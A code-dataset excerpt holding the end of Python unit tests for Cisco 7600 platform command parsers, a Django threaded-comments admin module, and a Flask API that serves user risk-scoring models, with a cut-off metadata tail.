Rev. 2.1\"\n PID: WS-X6582-2PA , VID: V06, SN: JAE0939LYNQ\n\n NAME: \"module 2/1\", DESCR: \"Serial Port Adapter\"\n PID: PA-4T+ , VID: , SN: 32861325\n\n NAME: \"module 5\", DESCR: \"WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 4.1\"\n PID: WS-SUP720-3BXL , VID: V11, SN: SAD09020BF8\n\n NAME: \"msfc sub-module of 5\", DESCR: \"WS-SUP720 MSFC3 Daughterboard Rev. 2.2\"\n PID: WS-SUP720 , VID: , SN: SAD090105M6\n\n NAME: \"switching engine sub-module of 5\", DESCR: \"WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.4\"\n PID: WS-F6K-PFC3BXL , VID: , SN: SAD090301K6\n\n NAME: \"module 6\", DESCR: \"WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 5.12\"\n PID: WS-SUP720-3BXL , VID: V11, SN: SAL15129MRC\n\n NAME: \"msfc sub-module of 6\", DESCR: \"WS-SUP720 MSFC3 Daughterboard Rev. 5.1\"\n PID: WS-SUP720 , VID: , SN: SAL15045PYS\n\n NAME: \"switching engine sub-module of 6\", DESCR: \"WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.11\"\n PID: WS-F6K-PFC3BXL , VID: V02, SN: SAL15129KW4\n\n NAME: \"PS 1 PWR-1900-AC/6\", DESCR: \"AC_6 power supply, 1900 watt 1\"\n PID: PWR-1900-AC/6 , VID: V02, SN: DCA1104401B\n\n NAME: \"PS 2 PWR-1900-AC/6\", DESCR: \"AC_6 power supply, 1900 watt 2\"\n PID: PWR-1900-AC/6 , VID: V02, SN: DCA11044011\n\n '''}\n\n parsed_output = {\n 'index': {\n 1: {\n 'descr': 'Cisco Systems Cisco 7600 6-slot Chassis System',\n 'name': 'CISCO7606',\n 'pid': 'CISCO7606',\n 'sn': 'FOX11140RN8',\n },\n 2: {\n 'descr': 'OSR-7600 Clock FRU 1',\n 'name': 'CLK-7600 1',\n 'pid': 'CLK-7600',\n 'sn': 'NWG1112014W',\n },\n 3: {\n 'descr': 'OSR-7600 Clock FRU 2',\n 'name': 'CLK-7600 2',\n 'pid': 'CLK-7600',\n 'sn': 'NWG1112014W',\n },\n 4: {\n 'descr': 'WS-X6748-GE-TX CEF720 48 port 10/100/1000mb Ethernet Rev. 2.7',\n 'name': 'module 1',\n 'pid': 'WS-X6748-GE-TX',\n 'sn': 'SAL1209HMW3',\n 'vid': 'V02',\n },\n 5: {\n 'descr': 'WS-F6700-CFC Centralized Forwarding Card Rev. 4.0',\n 'name': 'switching engine sub-module of 1',\n 'pid': 'WS-F6700-CFC',\n 'sn': 'SAL1207G5V1',\n 'vid': 'V05',\n },\n 6: {\n 'descr': '2 port adapter Enhanced FlexWAN Rev. 2.1',\n 'name': 'module 2',\n 'pid': 'WS-X6582-2PA',\n 'sn': 'JAE0939LYNQ',\n 'vid': 'V06',\n },\n 7: {\n 'descr': 'Serial Port Adapter',\n 'name': 'module 2/1',\n 'pid': 'PA-4T+',\n 'sn': '32861325',\n },\n 8: {\n 'descr': 'WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 4.1',\n 'name': 'module 5',\n 'pid': 'WS-SUP720-3BXL',\n 'sn': 'SAD09020BF8',\n 'vid': 'V11',\n },\n 9: {\n 'descr': 'WS-SUP720 MSFC3 Daughterboard Rev. 2.2',\n 'name': 'msfc sub-module of 5',\n 'pid': 'WS-SUP720',\n 'sn': 'SAD090105M6',\n },\n 10: {\n 'descr': 'WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.4',\n 'name': 'switching engine sub-module of 5',\n 'pid': 'WS-F6K-PFC3BXL',\n 'sn': 'SAD090301K6',\n },\n 11: {\n 'descr': 'WS-SUP720-3BXL 2 ports Supervisor Engine 720 Rev. 5.12',\n 'name': 'module 6',\n 'pid': 'WS-SUP720-3BXL',\n 'sn': 'SAL15129MRC',\n 'vid': 'V11',\n },\n 12: {\n 'descr': 'WS-SUP720 MSFC3 Daughterboard Rev. 5.1',\n 'name': 'msfc sub-module of 6',\n 'pid': 'WS-SUP720',\n 'sn': 'SAL15045PYS',\n },\n 13: {\n 'descr': 'WS-F6K-PFC3BXL Policy Feature Card 3 Rev. 1.11',\n 'name': 'switching engine sub-module of 6',\n 'pid': 'WS-F6K-PFC3BXL',\n 'sn': 'SAL15129KW4',\n 'vid': 'V02',\n },\n 14: {\n 'descr': 'AC_6 power supply, 1900 watt 1',\n 'name': 'PS 1 PWR-1900-AC/6',\n 'pid': 'PWR-1900-AC/6',\n 'sn': 'DCA1104401B',\n 'vid': 'V02',\n },\n 15: {\n 'descr': 'AC_6 power supply, 1900 watt 2',\n 'name': 'PS 2 PWR-1900-AC/6',\n 'pid': 'PWR-1900-AC/6',\n 'sn': 'DCA11044011',\n 'vid': 'V02',\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowInventory(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowInventory(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nclass TestShowModule(unittest.TestCase):\n dev1 = Device(name='empty')\n dev_iosv = Device(name='c7600')\n empty_output = {'execute.return_value': ''}\n output_c7600 = {'execute.return_value': '''\n Mod Ports Card Type Model Serial No.\n --- ----- -------------------------------------- ------------------ -----------\n 1 48 CEF720 48 port 10/100/1000mb Ethernet WS-X6748-GE-TX SAL1209HMW3\n 2 0 2 port adapter Enhanced FlexWAN WS-X6582-2PA JAE0939LYNQ\n 5 2 Supervisor Engine 720 (Hot) WS-SUP720-3BXL SAD09020BF8\n 6 2 Supervisor Engine 720 (Active) WS-SUP720-3BXL SAL15129MRC\n\n Mod MAC addresses Hw Fw Sw Status\n --- ---------------------------------- ----- ------------- ------------ -------\n 1 001e.4aff.ee89 to 001e.4aff.eeb8 2.7 12.2(14r)S 15.4(0.10) Ok\n 2 0015.2bff.e884 to 0015.2bff.e8c3 2.1 15.4(0.10)S 15.4(0.10)S Ok\n 5 0011.21ff.441a to 0011.21ff.441d 4.1 8.1(3 15.4(0.10) Ok\n 6 0022.55ff.039b to 0022.55ff.039e 5.12 8.5(4 15.4(0.10) Ok\n\n Mod Sub-Module Model Serial Hw Status\n ---- --------------------------- ------------------ ----------- ------- -------\n 1 Centralized Forwarding Card WS-F6700-CFC SAL1207G5V1 4.0 Ok\n 5 Policy Feature Card 3 WS-F6K-PFC3BXL SAD090301K6 1.4 Ok\n 5 MSFC3 Daughterboard WS-SUP720 SAD090105M6 2.2 Ok\n 6 Policy Feature Card 3 WS-F6K-PFC3BXL SAL15129KW4 1.11 Ok\n 6 MSFC3 Daughterboard WS-SUP720 SAL15045PYS 5.1 Ok\n\n Mod Online Diag Status\n ---- -------------------\n 1 Pass\n 2 Pass\n 5 Pass\n 6 Pass\n '''}\n\n parsed_output = {\n 'slot': {\n '1': {\n 'lc': {\n 'card_type': 'CEF720 48 port 10/100/1000mb Ethernet',\n 'fw_ver': '12.2(14r)S',\n 'hw_ver': '2.7',\n 'mac_address_from': '001e.4aff.ee89',\n 'mac_address_to': '001e.4aff.eeb8',\n 'model': 'WS-X6748-GE-TX',\n 'online_diag_status': 'Pass',\n 'ports': 48,\n 'serial_number': 'SAL1209HMW3',\n 'status': 'Ok',\n 'subslot': {\n 'WS-F6700-CFC': {\n 'hw_ver': '4.0',\n 'model': 'WS-F6700-CFC',\n 'serial_number': 'SAL1207G5V1',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n '2': {\n 'lc': {\n 'card_type': '2 port adapter Enhanced FlexWAN',\n 'fw_ver': '15.4(0.10)S',\n 'hw_ver': '2.1',\n 'mac_address_from': '0015.2bff.e884',\n 'mac_address_to': '0015.2bff.e8c3',\n 'model': 'WS-X6582-2PA',\n 'online_diag_status': 'Pass',\n 'ports': 0,\n 'serial_number': 'JAE0939LYNQ',\n 'status': 'Ok',\n 'sw_ver': '15.4(0.10)S',\n },\n },\n '5': {\n 'rp': {\n 'card_type': 'Supervisor Engine 720 (Hot)',\n 'fw_ver': '8.1(3',\n 'hw_ver': '4.1',\n 'mac_address_from': '0011.21ff.441a',\n 'mac_address_to': '0011.21ff.441d',\n 'model': 'WS-SUP720-3BXL',\n 'online_diag_status': 'Pass',\n 'ports': 2,\n 'serial_number': 'SAD09020BF8',\n 'status': 'Ok',\n 'subslot': {\n 'WS-F6K-PFC3BXL': {\n 'hw_ver': '1.4',\n 'model': 'WS-F6K-PFC3BXL',\n 'serial_number': 'SAD090301K6',\n 'status': 'Ok',\n },\n 'WS-SUP720': {\n 'hw_ver': '2.2',\n 'model': 'WS-SUP720',\n 'serial_number': 'SAD090105M6',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n '6': {\n 'rp': {\n 'card_type': 'Supervisor Engine 720 (Active)',\n 'fw_ver': '8.5(4',\n 'hw_ver': '5.12',\n 'mac_address_from': '0022.55ff.039b',\n 'mac_address_to': '0022.55ff.039e',\n 'model': 'WS-SUP720-3BXL',\n 'online_diag_status': 'Pass',\n 'ports': 2,\n 'serial_number': 'SAL15129MRC',\n 'status': 'Ok',\n 'subslot': {\n 'WS-F6K-PFC3BXL': {\n 'hw_ver': '1.11',\n 'model': 'WS-F6K-PFC3BXL',\n 'serial_number': 'SAL15129KW4',\n 'status': 'Ok',\n },\n 'WS-SUP720': {\n 'hw_ver': '5.1',\n 'model': 'WS-SUP720',\n 'serial_number': 'SAL15045PYS',\n 'status': 'Ok',\n },\n },\n 'sw_ver': '15.4(0.10)',\n },\n },\n },\n }\n\n def test_empty(self):\n self.dev1 = Mock(**self.empty_output)\n version_obj = ShowModule(device=self.dev1)\n with self.assertRaises(SchemaEmptyParserError):\n empty_parsed_output = version_obj.parse()\n \n def test_c7600(self):\n self.maxDiff = None\n self.device = Mock(**self.output_c7600)\n obj = ShowModule(device=self.device)\n parsed_output = obj.parse()\n self.assertEqual(parsed_output, self.parsed_output)\n\nif __name__ == '__main__':\n unittest.main()", "sub_path": "src/genie/libs/parser/ios/c7600/tests/test_show_platform.py", "file_name": "test_show_platform.py", "file_ext": "py", "file_size_in_byte": 26025, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 17, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 122, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowVersion", "line_number": 123, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 124, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 129, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowVersion", "line_number": 130, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 135, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 184, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.Dir", "line_number": 185, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 186, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 191, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.Dir", "line_number": 192, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 196, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 198, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 199, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 280, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowRedundancy", "line_number": 281, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 282, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 287, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowRedundancy", "line_number": 288, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 292, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 294, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 295, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 449, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowInventory", "line_number": 450, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 451, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 456, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowInventory", "line_number": 457, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 461, "usage_type": "attribute"}, {"api_name": "pyats.topology.Device", "line_number": 462, "usage_type": "call"}, {"api_name": "pyats.topology.Device", "line_number": 463, "usage_type": "call"}, {"api_name": "unittest.mock.Mock", "line_number": 598, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowModule", "line_number": 599, "usage_type": "call"}, {"api_name": "genie.metaparser.util.exceptions.SchemaEmptyParserError", "line_number": 600, "usage_type": "argument"}, {"api_name": "unittest.mock.Mock", "line_number": 605, "usage_type": "call"}, {"api_name": "genie.libs.parser.ios.c7600.show_platform.ShowModule", "line_number": 606, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 611, "usage_type": "call"}]} +{"seq_id": "411620587", "text": "from django.contrib import admin\nfrom django.contrib.comments.models import Comment\nfrom django.contrib.comments.admin import CommentsAdmin\nfrom threadedcomments import get_model\nfrom django.utils.translation import ugettext_lazy as _\nfrom threadedcomments.models import ThreadedComment\n\ndef remove_comment(modeladmin, request, queryset):\n queryset.update(is_removed=True)\n\ndef un_remove_comment(modeladmin, request, queryset):\n queryset.update(is_removed=False)\n\ndef public_comment(modeladmin, request, queryset):\n queryset.update(is_public=True)\n\ndef un_public_comment(modeladmin, request, queryset):\n queryset.update(is_public=False)\n\n\nremove_comment.short_description = _(\"Mark selected comments as removed\")\nun_remove_comment.short_description = _(\"Mark selected comments as not removed\")\npublic_comment.short_description = _(\"Mark selected comments as published\")\nun_public_comment.short_description = _(\"Mark selected comments as unpublished\")\nCommentsAdmin.actions.append(remove_comment)\nCommentsAdmin.actions.append(un_remove_comment)\nCommentsAdmin.actions.append(public_comment)\nCommentsAdmin.actions.append(un_public_comment)\n\nif get_model() is ThreadedComment:\n if Comment in admin.site._registry:\n admin.site.unregister(Comment)\n admin.site.register(Comment, CommentsAdmin)\n", "sub_path": "threadedcomments/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.utils.translation.ugettext_lazy", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 23, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 27, "usage_type": "name"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions.append", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin.actions", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 28, "usage_type": "name"}, {"api_name": "threadedcomments.get_model", "line_number": 30, "usage_type": "call"}, {"api_name": "threadedcomments.models.ThreadedComment", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.admin.site", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.unregister", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 32, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 33, "usage_type": "call"}, {"api_name": "django.contrib.comments.models.Comment", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.comments.admin.CommentsAdmin", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "113252127", "text": "from flask_restplus import Namespace, Resource, fields, reqparse\nfrom utils import ResourceException, output_json\nfrom flask import g as request_context, request, jsonify\nimport ah_datadog\nimport datadog\nimport logging\nimport time\n\nfrom modeling.misc.experiment import UserExperiment\nfrom modeling.misc.predictor import Predictor\nfrom modeling.model.identityrisk import *\nfrom modeling.model.activation.ActivationRiskModel import ActivationRiskModel\nfrom modeling.model.max_adjustment.MaxAdjustmentModel import MaxAdjustmentModel\nfrom modeling.model.newuser.NewUserRiskModel import NewUserRiskModel\nfrom modeling.model.restore.RestoreModel import RestoreModel\n\n\napi = Namespace('risk')\nlogger = logging.getLogger(\"ah.risk\")\n\nsimple_response_model = api.model('Response', {\n 'Message': fields.String,\n 'Status': fields.Integer\n })\n\n\n@api.route(\"/activation/\")\n@api.doc(params={'user_id': fields.Integer})\nclass Activation(Resource):\n @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:activation\"])\n @api.response(200, 'Success', simple_response_model)\n def get(self, user_id):\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:activation\"])\n uid = _validate_user_id(user_id)\n logger.info(\"activation():\")\n\n result = {'userId': uid}\n\n # Pass the test uid successfully for alert tests:\n if uid in [0, '0']:\n return\n\n try:\n\n model = ActivationRiskModel()\n fg = model.getAllFeatures(uid)\n predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n try:\n score = predictor.getScore()\n except:\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n tags=[\"operation:activation_prediction\"])\n logger.exception('Activation Risk scoring default -1 assigned')\n score = -1\n\n if score >= 0:\n reasonCode = predictor.getReasonCode()\n else:\n reasonCode = predictor.getReasonCodeForNegativeOne()\n logger.debug('Activation Risk scoring default -1 assigned, reasonCode: %s', reasonCode)\n\n result['score'] = score\n result['reasonCode'] = reasonCode\n\n return jsonify(result)\n\n except:\n logger.exception('Request failed')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:activation\"])\n raise ResourceException('request of activation risk failure, userid = %s.' % user_id)\n\n\n@api.route(\"/identity/\")\n@api.doc(params={'user_id': fields.Integer})\nclass Identity(Resource):\n @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:identity\"])\n @api.response(200, 'Success', simple_response_model)\n def get(self, user_id):\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:identity\"])\n uid = _validate_user_id(user_id)\n logger.info(\"identity():\")\n\n # Pass the test uid successfully for alert tests:\n if uid in [0, '0']:\n return\n\n try:\n r = checkIdentity(uid)\n\n json_string = jsonify(r.toDict())\n except Exception as e:\n logger.exception('request of identity risk failed')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:identity\"])\n raise ResourceException('request of identity risk failure, userid = %s.' % user_id)\n\n return json_string\n\n\n\n\n@api.route(\"/max_adjustment/\")\n@api.doc(params={'user_id': fields.Integer})\nclass MaxAdjustment(Resource):\n @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:max_adjustment\"])\n @api.response(200, 'Success', simple_response_model)\n def get(self, user_id):\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:max_adjustment\"])\n uid = _validate_user_id(user_id)\n logger.info(\"max_adjustment():\")\n\n result = {'userId': uid}\n\n # Pass the test uid successfully for alert tests:\n if uid in [0, '0']:\n return\n\n try:\n t0 = time.time()\n model = MaxAdjustmentModel()\n fg = model.getAllFeatures(uid)\n\n # Model with new features\n eid = 67\n modelExp = UserExperiment()\n modelExpid = modelExp.getUserGroup(uid, eid)\n\n t1 = time.time()\n # lightgbm model\n if modelExpid == 2:\n predictor = lightgbm_model(fg, model)\n else:\n predictor = logistic_regression_model(fg, model)\n\n try:\n score = predictor.getScore()\n if modelExpid ==2:\n logger.info('lightgbm prediction response time is %s', (time.time() - t1))\n logger.info('lightgbm total response time is %s', (time.time() - t0))\n else:\n logger.info('logistic regression prediction response time is %s', (time.time() - t1))\n logger.info('logistic regression total response time is %s', (time.time() - t0))\n except:\n logger.exception(\"default score -1 assigned\")\n model_name = \"lightgbm\" if modelExpid == 2 else \"logisticRegression\"\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n tags=[\"operation:max_adjustment_prediction\",\n \"model:%s\" % model_name])\n score = -1\n\n if modelExpid == 2:\n reasonCode = []\n reasonCat = []\n logger.info('risk score = %s, reasonCode = lightgbm', score)\n else:\n if score >= 0:\n reasonCode = predictor.getReasonCode()\n reasonCat = predictor.getReasonCategory()\n logger.info('risk score = %s, reasonCode = %s', score, reasonCode)\n else:\n reasonCode = predictor.getReasonCodeForNegativeOne()\n reasonCat = []\n logger.error('risk score = %s, reasonCode = %s', score, reasonCode)\n\n weightedTipRate = predictor.getTipRate()\n totalAmount = predictor.getTotalAmount()\n avgPayrollAmount = predictor.getAvgPayroll()\n\n # try:\n # predictor.__writeDB__('max_adjustment', connection, fg.f)\n # except:\n # log.error(\"Max adjustmentRisk writing db (%s)(%s) \"\n # \"(userid = %s):%s\" %\n # (request. remote_addr, contextid,\n # userid, traceback.format_exc()))\n\n result['score'] = score\n result['reasonCode'] = reasonCode\n result['weightedTipRate'] = weightedTipRate\n result['totalAmount'] = totalAmount\n result['reasonCategory'] = reasonCat\n result['avgPayrollAmount'] = avgPayrollAmount\n\n logger.debug('Returned json: %s', result)\n return jsonify(result)\n\n except:\n logger.exception('Max adjustment risk score request failed')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:max_adjustment\"])\n raise ResourceException('request of max adjustment risk failure, userid = %s.' % user_id)\n\n\n@api.route(\"/new_user/\")\n@api.doc(params={'user_id': fields.Integer})\nclass NewUser(Resource):\n @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:new_user\"])\n @api.response(200, 'Success', simple_response_model)\n def get(self, user_id):\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:new_user\"])\n uid = _validate_user_id(user_id)\n logger.info(\"new_user():\")\n\n result = {'userId': uid}\n\n # Pass the test uid successfully for alert tests:\n if uid in [0, '0']:\n return\n\n try:\n model = NewUserRiskModel()\n fg = model.getAllFeatures(uid)\n predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n try:\n score = predictor.getScore()\n except:\n logger.warning('Default score 10 assigned')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n tags=[\"operation:new_user_prediction\"])\n score = 10\n\n if score <= 1:\n reasonCode = predictor.getReasonCode()\n logger.info('risk score = %s, reasonCode = %s',\n score, reasonCode)\n else:\n reasonCode = predictor.getReasonCodeForNegativeOne()\n logger.error('risk score = %s, reasonCode = %s',\n score, reasonCode)\n\n result['score'] = score\n result['reasonCode'] = reasonCode\n\n return jsonify(result)\n\n except Exception:\n logger.exception('Request failed')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:new_user\"])\n raise ResourceException('request of new user risk failure, userid = %s.' % user_id)\n finally:\n logger.info('end of request')\n\n\n@api.route(\"/restore/\")\n@api.doc(params={'user_id': fields.Integer})\nclass Restore(Resource):\n @ah_datadog.datadog_timed(name=\"endpoint.timing\", tags=[\"operation:restore\"])\n @api.response(200, 'Success', simple_response_model)\n def get(self, user_id):\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"requests\", tags=[\"operation:restore\"])\n uid = _validate_user_id(user_id)\n logger.info(\"restore():\")\n\n result = {'userId': uid}\n\n # Pass the test uid successfully for alert tests:\n if uid in [0, '0']:\n return\n\n try:\n model = RestoreModel()\n fg = model.getAllFeatures(uid)\n predictor = Predictor(fg.f, filepath=model.pkl_path)\n\n try:\n score = predictor.getScore()\n except:\n logger.exception('Default score -1 assigned')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\",\n tags=[\"operation:restore_prediction\"])\n score = -1\n\n if score >= 0:\n reasonCode = predictor.getReasonCode()\n logger.info('risk score = %s, reasonCode = %s',\n score, reasonCode)\n else:\n reasonCode = predictor.getReasonCodeForNegativeOne()\n logger.error('risk score = %s, reasonCode = %s',\n score, reasonCode)\n\n weightedTipRate = predictor.getTipRate()\n totalAmount = predictor.getTotalAmount()\n avgPayrollAmount = predictor.getAvgPayroll()\n\n result['score'] = score\n result['reasonCode'] = reasonCode\n result['weightedTipRate'] = weightedTipRate\n result['totalAmount'] = totalAmount\n result['avgPayrollAmount'] = avgPayrollAmount\n\n return jsonify(result)\n\n except:\n logger.exception('Request failed')\n datadog.statsd.increment(ah_datadog.get_datadog_prefix() + \"exception\", tags=[\"operation:restore\"])\n raise ResourceException('request of restore risk failure, userid = %s.' % user_id)\n\n\n@ah_datadog.datadog_timed(name=\"model.timing\", tags=[\"operation:lightgbm\"])\ndef lightgbm_model(fg, model):\n filename_lgb = 'lightgbm.pkl'\n predictor = Predictor(fg.f, filename=filename_lgb, filepath=model.pkl_path)\n return predictor\n\n\n@ah_datadog.datadog_timed(name=\"model.timing\", tags=[\"operation:logisticRegression\"])\ndef logistic_regression_model(fg, model):\n filename_old = 'old_logisticRegression.pkl'\n predictor = Predictor(fg.f, filename=filename_old, filepath=model.pkl_path)\n return predictor\n\n# helper function for validating IDs\ndef _validate_user_id(user_id):\n try:\n request_context.extras['UserId'] = user_id\n return int(user_id)\n except ValueError:\n raise ResourceException('invalid userid %s (integer expected)' % user_id, status_code=400)\n\n\n", "sub_path": "src/resources/risk.py", "file_name": "risk.py", "file_ext": "py", "file_size_in_byte": 12565, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_restplus.Namespace", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_restplus.fields.String", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 22, "usage_type": "name"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 29, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 33, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 33, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 33, "usage_type": "call"}, {"api_name": "modeling.model.activation.ActivationRiskModel.ActivationRiskModel", "line_number": 45, "usage_type": "call"}, {"api_name": "modeling.misc.predictor.Predictor", "line_number": 47, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 52, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 52, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 66, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 70, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 70, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.ResourceException", "line_number": 71, "usage_type": "call"}, {"api_name": "ah_datadog.datadog_timed", "line_number": 30, "usage_type": "call"}, {"api_name": "flask_restplus.fields.Integer", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask_restplus.fields", "line_number": 28, "usage_type": "name"}, {"api_name": "flask_restplus.Resource", "line_number": 76, "usage_type": "name"}, {"api_name": "datadog.statsd.increment", "line_number": 80, "usage_type": "call"}, {"api_name": "datadog.statsd", "line_number": 80, "usage_type": "attribute"}, {"api_name": "ah_datadog.get_datadog_prefix", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 91, "usage_type": "call"}, {"api_name": "datadog.statsd.increment", "line_number": 94, 